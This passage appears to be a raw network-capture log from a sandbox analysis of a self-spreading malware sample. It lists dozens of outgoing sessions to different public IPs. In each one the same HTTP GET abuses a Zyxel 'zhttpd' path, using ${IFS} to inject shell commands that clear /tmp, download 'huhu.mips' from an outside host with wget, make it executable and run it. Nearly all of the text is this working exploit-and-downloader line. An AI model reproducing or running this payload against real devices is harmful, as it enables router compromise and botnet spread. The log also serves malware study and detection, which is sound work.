                                            Feb 2, 2024 06:20:59.387495041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            918192.168.2.1548958132.101.52.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387553930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            919192.168.2.1554094184.147.2.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387581110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            920192.168.2.1535708109.69.191.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387620926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            921192.168.2.1552418181.72.253.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387667894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            922192.168.2.1549474150.187.169.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387698889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            923192.168.2.155931677.192.201.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387753963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            924192.168.2.154952034.95.165.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387789965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            925192.168.2.155969273.115.173.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387824059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            926192.168.2.154945871.214.153.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387856007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            927192.168.2.1539370108.241.45.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387907982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            928192.168.2.154602680.100.214.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387938023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            929192.168.2.1556286106.202.46.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.387972116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            930192.168.2.1537506179.41.132.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388027906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            931192.168.2.1547488212.246.90.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388061047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            932192.168.2.1555860110.60.156.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388113022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            933192.168.2.1541544194.42.123.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388149023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            934192.168.2.154009265.239.88.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388178110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            935192.168.2.154779618.226.252.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388259888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            936192.168.2.1537906185.252.117.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388315916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            937192.168.2.155657078.223.229.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388365984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            938192.168.2.1533710207.57.161.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388411999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            939192.168.2.1560802157.112.136.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388443947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            940192.168.2.153758895.71.173.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388477087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            941192.168.2.1535602221.219.150.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388531923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            942192.168.2.1542032209.222.57.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388566017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            943192.168.2.1545844190.1.44.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388617992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            944192.168.2.154966071.88.254.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388643026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            945192.168.2.154674285.227.155.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388690948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            946192.168.2.155045851.202.185.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388732910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            947192.168.2.1537224223.138.184.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388760090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            948192.168.2.1539636129.227.170.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388816118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            949192.168.2.1539424135.220.99.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388832092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            950192.168.2.1549094145.245.65.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388897896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            951192.168.2.1559306184.231.219.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388922930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            952192.168.2.1537944113.150.71.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388964891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            953192.168.2.153774841.116.234.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.388993025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            954192.168.2.1552672168.4.114.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389008045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            955192.168.2.15395105.160.228.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389048100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            956192.168.2.155082218.148.184.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389089108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            957192.168.2.155781251.166.45.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389121056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            958192.168.2.1544090153.144.228.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389153957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            959192.168.2.1552332103.11.61.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389203072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            960192.168.2.1537000208.135.84.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389241934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            961192.168.2.1533496191.251.244.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389272928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            962192.168.2.153895291.93.41.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389322996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            963192.168.2.155612451.215.234.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389364958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            964192.168.2.1535594219.92.146.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389410973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            965192.168.2.1536808115.243.177.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389451981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            966192.168.2.1559258136.18.144.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389483929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            967192.168.2.1536646139.190.62.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389540911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            968192.168.2.1556976108.115.11.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389558077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            969192.168.2.156057681.43.157.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389592886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            970192.168.2.155367680.218.160.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389630079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            971192.168.2.155768477.185.65.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389655113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            972192.168.2.15588524.197.163.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389714003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            973192.168.2.155720869.20.114.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389740944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            974192.168.2.1545042100.160.115.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389765024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            975192.168.2.1545108170.193.88.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389817953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            976192.168.2.1550520151.223.85.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389863014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            977192.168.2.155540437.25.14.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389904976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            978192.168.2.1540268168.252.3.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389936924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            979192.168.2.154903444.7.107.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389975071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            980192.168.2.154439038.11.209.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:59.389997005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            981192.168.2.153481697.32.94.152443
                                            TimestampBytes transferredDirectionData
